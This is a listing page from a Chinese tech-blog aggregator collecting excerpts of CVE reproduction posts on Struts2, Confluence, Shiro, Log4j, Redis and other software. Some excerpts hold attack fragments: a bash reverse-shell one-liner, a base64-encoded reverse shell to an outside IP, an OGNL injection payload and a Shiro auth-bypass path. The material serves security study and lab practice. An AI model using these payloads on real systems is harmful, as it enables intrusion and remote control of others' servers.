E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CVE漏洞复现
redis漏洞研究
今天的计划是修复线上的redis漏洞Redis整形溢出漏洞(
CVE
-2021-32761)及修复脚本目的:修复生产的redis漏洞,主要是整数溢出漏洞,但是过程中发现还有反弹shell漏洞(次要,毕竟需要密码
张dozen
·
2024-01-25 11:56
后端
ATF(TF-A)安全通告TF-V11——恶意的SDEI SMC可能导致越界内存读取(
CVE
-2023-49100)
目录一、ATF(TF-A)安全通告TFV-11(
CVE
-2023-49100)二、透过事务看本质SDEI是干啥的呢?
卢鸿波
·
2024-01-25 08:02
博客目录导读
ATF
TF-A
安全通告
CVE
SMC
SDEI
越界内存访问
Monitorr 任意文件上传
漏洞复现
(
CVE
-2024-0713)
0x01产品简介Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。0x02漏洞概述Monitorr1.7.6m版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件/assets/php/upload.php的未知功能。对参数fileToUpload的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。0x03复现环境FOFA:body=
OidBoy_G
·
2024-01-25 06:01
漏洞复现
web安全
安全
Atlassian Confluence Data Center and Server 权限提升
漏洞复现
(
CVE
-2023-22515)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G
·
2024-01-25 06:30
漏洞复现
atlassian
安全
web安全
蓝凌OA sysUiExtend.do 任意文件上传
漏洞复现
0x01产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展。0x02漏洞概述蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩
OidBoy_G
·
2024-01-25 06:28
漏洞复现
安全
web安全
[
漏洞复现
]Apache Struts2/S2-015 (
CVE
-2013-2134)
一、漏洞情况分析2.3.14.3之前的ApacheStruts2允许远程攻击者通过带有在通配符匹配期间未正确处理的精心制作的操作名称的请求执行任意OGNL代码,这是与
CVE
-2013-2135不同的漏洞
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[
漏洞复现
]Apache POI < 3.10.1 XXE(
CVE
-2014-3529)
二、
漏洞复现
春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[
漏洞复现
]Apache Struts2/S2-013 (
CVE
-2013-1966)
二、
漏洞复现
春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[
漏洞复现
] Craft (
CVE
-2023-41892)
前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key
·
2024-01-25 06:10
漏洞复现
安全
web安全
[
漏洞复现
]Apache Shiro < 1.6.0 验证绕过漏洞(
CVE
-2020-13933)
二、
漏洞复现
春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
[
漏洞复现
]Apache Struts2/S2-015 (
CVE
-2013-2135)
二、
漏洞复现
春秋云境.com进入靶场开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key
·
2024-01-25 06:04
Struts
春秋云境靶场
apache
struts
java
web安全
安全
GitLab升级版本(任意用户密码重置漏洞
CVE
-2023-7028)
目录前言漏洞分析影响范围查看自己的GitLab版本升级路程升级过程13.1.1113.8.8-14.0.1214.3.614.9.5-16.1.6前言最近GitLab发了个紧急漏洞需要修复,ok接到命令立刻着手开始修复,在修复之前先大概了解一下这个漏洞是什么东西漏洞分析1、组件介绍:GitLab是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。2、漏洞
九辰O
·
2024-01-25 05:56
gitlab
log4j2漏洞综合利用_
CVE
-2021-44228_CNVD-2021-95919
1.漏洞利用1.1.rmi利用1、在检测到目标存在log4j2漏洞后,确定漏洞参数,尝试接受目标rmi请求。成功接收到请求。出现JRMIK字样即代表可接受RMI请求。2、漏洞利用。使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar执行命令,反弹shell。java-jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-
LQxdp
·
2024-01-25 04:39
log4j
CVE-2021-44228
CNVD-2021-95919
rmi
ldap
confluence模版注入漏洞_
CVE
-2023-22527
1.漏洞简介Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。ConfluenceDataCenter和ConfluenceServer多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。2.影响版本ConfluenceDataCenter和ConfluenceServer8.0.xConfl
LQxdp
·
2024-01-25 04:08
漏洞复现
confluence
漏洞复现
cve-2023-22527
警惕!Citrix NetScaler ADC 和 NetScaler Gateway漏洞风险通告
近日,亚信安全CERT监控到Citrix发布了NetScalerADC和NetScalerGateway的安全公告,披露了2个安全漏洞
CVE
-2023-6548和
CVE
-2023-6549。
亚信安全官方账号
·
2024-01-25 03:22
漏洞风险通告
网络
大数据
web安全
安全
网络安全
Atlassian Confluence 模板注入代码执行漏洞风险通告
近日,亚信安全CERT监控到Atlassian公司发布了一则安全公告,针对ConfluenceDataCenterandServer存在的远程代码执行漏洞(
CVE
-2023-22527)进行了修复。
亚信安全官方账号
·
2024-01-25 03:21
漏洞风险通告
开发语言
人工智能
apache
struts
java
安全
【漏洞修复】Apache Log4j 远程代码执行漏洞(
CVE
-2021-44228、
CVE
-2021-45046)
摘要本文档适用于OpenEuler20、OpenEuler21、OpenEuler22、麒麟V10SP3、统信V10操作系统,修复Log4漏洞。问题描述ApacheLog4j是一个功能强大的日志组件,提供方便的日志记录。ApacheLog4j2存在远程代码执行漏洞,由于ApacheLog4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。修复方法方法一:升级log4j版
荒Huang
·
2024-01-25 02:42
apache
log4j
vulhub之Spring篇
CVE
-2022-22978Spring-security认证绕过漏洞一、环境启动web服务正常访问admin页面,因为没有经过身份认证,会被禁止;加上换回车符\n后正则表达式不会匹配;将换行符\n用%
咩了个咩咩
·
2024-01-25 02:27
spring
java
后端
关于H3C路由器漏洞的情况说明
漏洞简介:H3C多款企业路由器actionpolicy_status信息泄露漏洞漏洞编号:NVDB-CNVDB-2022938054(
CVE
-2023-5142)NVBD收录时间:2022年12月29日厂商回复已修复时间
weixin_44106034
·
2024-01-24 22:48
智能路由器
网络
(BUUCTF)ycb_2020_easy_heap (glibc2.31的off-by-null + orw)
分析程序,开启了沙盒,只禁用了exe
cve
。存在一个off-by-
LtfallQwQ
·
2024-01-24 22:14
pwn_writeup
pwn
安全
系统安全
D-Tale SSRF
漏洞复现
(
CVE
-2024-21642)
0x01产品简介D-tale是一个在2020年2月推出的库,是Pandas数据结构的可视化工具。它具有许多功能,对于探索性数据分析非常方便、支持交互式绘图、3d绘图、热图、特征之间的相关性、构建自定义列等等。0x02漏洞概述D-Tale是Pandas数据结构的可视化工具。3.9.0之前的D-Tale版本的用户可能容易受到服务器端请求伪造(SSRF)的攻击,从而使攻击者能够访问服务器上的文件。0x0
OidBoy_G
·
2024-01-24 22:45
漏洞复现
安全
web安全
【复现】Hytec Inter HWL 2511 SS路由器RCE漏洞_25
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述HytecInterHWL2511SS是日本HytecInter公司的一款工业级LTE路由器,可用于远程数据传输
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
系统安全
网络安全
【复现】万户ezoffice协同管理平台 SQL注入漏洞_26
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述万户ezOFFICE协同管理平台分为企业版和政务版。
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
网络安全
系统安全
数据库
【复现】奥威亚视屏云平台文件读取漏洞_27
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述奥威亚视屏云平台拥有丰富的应用模块,包括结对帮扶、网络教研、教研共同体、优课汇聚、教学资源、在线巡课、AI
穿着白衣
·
2024-01-24 22:44
安全漏洞
安全
web安全
系统安全
网络安全
【复现】D-Tale SSRF漏洞(
CVE
-2024-21642)_26
目录一.概述二.漏洞影响三.
漏洞复现
1.漏洞一:四.修复建议:五.搜索语法:六.免责声明一.概述D-Tale数据可视化插件是后端框架Flask与前端框架React组合产生的一款开源的数据可视化分析插件。
穿着白衣
·
2024-01-24 22:13
安全漏洞
安全
web安全
网络安全
系统安全
计算线圆交点
privatestati
cVe
ctor2CalIntersection(Vector2start,Vector2end,Vector2center){Vector2v=Vector2.zero;floatdisY1
敉霞
·
2024-01-24 16:05
V2022全栈培训笔记(WEB攻防46-WEB攻防-通用漏洞&PHP反序列化&原生类&漏洞绕过&公私有属性)
反序列化语言特性漏洞绕过~其他魔术方法共有&私有&保护语言模式方法漏洞~原生类获取利用配合#反序列化利用大概分类三类-魔术方法的调用逻辑如触发条件-语言原生类的调用逻辑如SoapClient-语言自身的安全缺陷如
CVE
清歌secure
·
2024-01-24 16:20
笔记
php
网络安全
安全
2023年春秋杯网络安全联赛春季赛Misc-AK
sudo
CVE
-2023-22809没有vimvi,就用原生编辑器nanoEDITOR='nano--/flag'sudoedit/etc/GAMELABpiphack可以下载任意包,考虑构造恶意的包,
Y0ng778
·
2024-01-24 16:50
网络安全
python
linux
【笔记】Helm-3 主题-16 发布计划策略
Semanti
cVe
rsioning2.0.0|Semanti
cVe
rsioni
许科大
·
2024-01-24 12:40
Helm
云原生
kubernetes
k8s
cve
-2022-0847 dirty pipe 摘录
Breeze_CAT/article/details/123393188图解https://xz.aliyun.com/t/11016提权https://bsauce.github.io/2022/04/03/
CVE
goodcat666
·
2024-01-24 12:32
pwn_cve_kernel
linux
pwn
黑客“盯上了” Atlassian Confluence RCE 漏洞
BleepingComputer网站消息,安全研究人员近日观察到一些威胁攻击者正在试图针对
CVE
-2023-22527远程代码执行漏洞“做文章”,以发起大规模网络攻击活动。
FreeBuf_
·
2024-01-24 08:54
atlassian
ubuntu 20.04 aarch64 平台交叉编译 libffi 库
libffi库,也就是libffi库也需要交叉编译环境:ubuntu20.04交叉编译工具链:这里使用musllibc的gcc交叉编译工具链,aarch64-linux-musleabi-gcc,gcc版本gc
cve
rsion12.2.0
张世争
·
2024-01-24 06:47
嵌入式Linux
ubuntu
libffi
交叉编译
Stable Diffusion能生成视频了!动画版上线!支持文本图像视频多种输入方式
点击下方卡片,关注“
CVe
r”公众号AI/CV重磅干货,第一时间送达点击进入—>【GAN和扩散模型】微信技术交流群西风发自凹非寺转载自:量子位(QbitAI)StableDiffusion也能生成视频了
Amusi(CVer)
·
2024-01-24 00:14
stable
diffusion
人工智能
计算机视觉
【
漏洞复现
】用友NC Cloud portal/file接口任意文件读取漏洞
文章目录前言声明一、用友NCCloudportal/file接口简介二、漏洞描述三、影响版本四、
漏洞复现
五、修复建议前言用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。
李火火安全阁
·
2024-01-24 00:32
漏洞复现
NC
Cloud
用友 GRP U8 UploadFile 命令执行漏洞
文章目录前言声明一、漏洞描述二、影响版本三、
漏洞复现
前言用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。
李火火安全阁
·
2024-01-24 00:57
漏洞复现
GRP-U8
【漏洞分析】【spring】【
CVE
-2018-1273】【远程命令执行】spel注入漏洞
https://xz.aliyun.com/t/2269http://xxlegend.com/2018/04/12/
CVE
-2018-1273-%20RCE%20with%20Spring%20Data
growing27
·
2024-01-23 18:41
oracle中一个会话,一个Oracle会话严重阻塞的案例
环境:osrhel5.3dbms三节点Oracle10gra
cve
r10.2.0.4现象:某些工作站死机或网络异常后,特定的收费人员在ZLHIS中收费时,点击确定后,程序无响应.将会话kill后,重新登录
贲禹强
·
2024-01-23 18:35
oracle中一个会话
Atlassian Confluence RCE
漏洞复现
(
CVE
-2023-22527)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluence/template/aui/text-inline.vm接口处存在velocity模板注入,未
OidBoy_G
·
2024-01-23 10:24
漏洞复现
atlassian
安全
web安全
Aria2 WebUI控制台 任意文件读取
漏洞复现
(
CVE
-2023-39141)
0x01产品简介Aria2WebUI控制台是用于下载文件的实用程序。它支持HTTP(S)/FTP/SFTP/BitTorrent和Metalink协议。aria2可以从多个来源/协议下载文件,并尝试利用您的最大下载带宽。它支持同时从HTTP(S)/FTP/SFTP和BitTorrent下载文件,而从HTTP(S)/FTP/SFTP下载的数据上传到BitTorrent群。使用Metalink块校验和
OidBoy_G
·
2024-01-23 10:24
漏洞复现
安全
web安全
Viessmann Vitogate RCE
漏洞复现
(
CVE
-2023-45852)
0x01产品简介ViessmannVitogate300是用于将ViessmannLON连接到BACnet或Modbus的网关。0x02漏洞概述Vitogate300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。0x03影响范围version<=2.1.3.00x04复现环境FOFA:app="Vito
OidBoy_G
·
2024-01-23 10:54
漏洞复现
安全
web安全
PrestaShop购物系统 SQL注入
漏洞复现
(
CVE
-2023-30150)
0x01产品简介PrestaShop是一个功能丰富,基于PHP5开发的Web2.0网上购物系统。PrestaShop具有可定制,稳定等特点。整个系统只有5.8MB,易于快速安装。0x02漏洞概述PrestaShop的部分主题中使用LeoCustomAjax模块拓展,LeoCustomAjax模块中可以在/modules/leocustomajax/leoajax.php中使用多个GET参数(cat
OidBoy_G
·
2024-01-23 10:20
漏洞复现
安全
web安全
redis未授权访问全
漏洞复现
redis未授权访问全
漏洞复现
Redis有关的漏洞具有明显的时间分段性,在15年11月之前,主要是未授权导致的数据泄露,获得一些账号密码。
清歌secure
·
2024-01-23 07:03
漏洞复现
redis
数据库
web安全
网络安全
网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE)
第54天服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE知识点:1、服务攻防数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-
CVE
-2012-2122
清歌secure
·
2024-01-23 07:24
网络安全全栈学习笔记
web安全
笔记
redis
网络
安全
vulhub之Zabbix篇
CVE
-2016-10134--SQL注入一、漏洞介绍zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
咩了个咩咩
·
2024-01-23 06:47
zabbix
vulhub之redis篇
CVE
-2022-0543|redis的远程代码执行漏洞简介
CVE
-2022-0543该Redis沙盒逃逸漏洞影响Debian系的Linux发行版本,并非Redis本身漏洞,漏洞形成原因在于系统补丁加载了一些
咩了个咩咩
·
2024-01-23 06:10
junit
Docker逃逸---
CVE
-2019-5736浅析
一、产生原因Docker执行命令时,先向镜像管理的containerd发送gRPC请求,containerd收到请求后,再发送给具体的容器管理containerd-shim,shim根据OCI协议将命令发送给runc执行,所以实际上执行命令的是runc漏洞大概意思是:/proc/[PID]/exe这个链接文件的指向是该进程的二进制文件,而在runcexec加入到容器的命名空间之后,容器内进程已经能
Catherines7
·
2024-01-23 04:19
安全
docker
容器
运维
安全
【
漏洞复现
】SpringBlade export-user接口SQL注入漏洞
文章目录前言声明一、SpringBlade系统简介二、漏洞描述三、影响版本四、
漏洞复现
五、修复建议前言SpringBlade是一个由商业级项目升级优化而来的微服务架构采用SpringBoot2.7、SpringCloud2021
李火火安全阁
·
2024-01-23 02:24
漏洞复现
SpringBlade
Samba远程崩溃或代码执行漏洞(
CVE
-2015-0240)简要分析
1.搭建samba环境注意:在Linux系统上使用源码编译来安装samba必须要将系统自带的全部关于samba的软件均删除,可用如下命令查看已安装的samba软件:[bb@localhostbin]$rpm-qa|grepsambasamba-common-3.6.23-14.el6_6.x86_64samba-winbind-3.6.23-14.el6_6.x86_64samba-winbind
Traxer
·
2024-01-23 02:24
漏洞分析
Samba
远程代码崩溃
【权限提升】Linux Kernel ebpf 提权漏洞(
CVE
-2022-23222)
文章目录前言一、漏洞描述二、漏洞影响版本三、
漏洞复现
四、漏洞修复前言
CVE
-2022-23222LinuxKernelebpf权限提升漏洞一、漏洞描述eBPF(extendedBerkeleyPacketFilter
李火火安全阁
·
2024-01-23 02:54
Linux
权限提升
漏洞复现
安全
CVE
-2020-1938
漏洞复现
(文末附EXP代码)
CVE
-2020-1938ApacheTomcat文件包含
漏洞复现
1环境搭建1.1Vulhub靶机搭建1.1.1环境安装(1)安装docker$curl-fsSLhttps://get.docker.com
Vitaminapple
·
2024-01-23 02:53
漏洞复现
网络安全
tomcat
上一页
5
6
7
8
9
10
11
12
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他